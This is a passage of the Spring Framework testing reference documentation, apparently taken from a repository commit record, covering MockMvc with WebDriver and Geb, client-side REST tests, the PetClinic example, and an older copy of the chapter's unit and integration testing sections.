library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/GettingStarted[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny unrecognized method calls or property accesses\/references that are not found will be\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define a URL in which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/intro.html#the_jquery_ish_navigator_api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess());\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We could define as additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of testing `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder().build();\n----\n\nEven with unordered requests by default each request is allowed to execute once only.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, then that order only applies to the first of\nany expected request. For example if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\"\nbut aside from that subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching __\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST tests.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit environment. Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","old_contents":"[[testing]]\n= Testing\n\n[partintro]\n--\nThe adoption of the test-driven-development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so coverage of Spring's\nsupport for integration testing is covered (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and suchlike)... the chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n--\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see <<beans-definition-profiles>>\nand <<beans-property-source-abstraction>>). `MockEnvironment` and\n`MockPropertySource` are useful for developing __out-of-container__ tests for code that\ndepends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ++DataSource++s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. As of\nSpring Framework 4.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 3.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ++Controller++s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n[[mock-objects-portlet]]\n==== Portlet API\nThe `org.springframework.mock.web.portlet` package contains a set of Portlet API mock\nobjects, targeted at usage with Spring's Portlet MVC framework.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ++Controller++s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ++Controller++s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n++ApplicationContext++s and ++WebApplicationContext++s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ++DataSource++s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. For\ndetails, see <<jdbc-embedded-database-support>> and\n<<jdbc-embedded-database-dao-testing>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n* `@ContextConfiguration`\n\n+\n\nDefines class-level metadata that is used to determine how to load and configure an\n`ApplicationContext` for integration tests. Specifically, `@ContextConfiguration`\ndeclares the application context resource `locations` or the annotated `classes`\nthat will be used to load the context.\n\n+\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextIntializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\n+\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n* `@WebAppConfiguration`\n\n+\n\nA class-level annotation that is used to declare that the `ApplicationContext` loaded\nfor an integration test should be a `WebApplicationContext`. The mere presence of\n`@WebAppConfiguration` on a test class ensures that a `WebApplicationContext` will 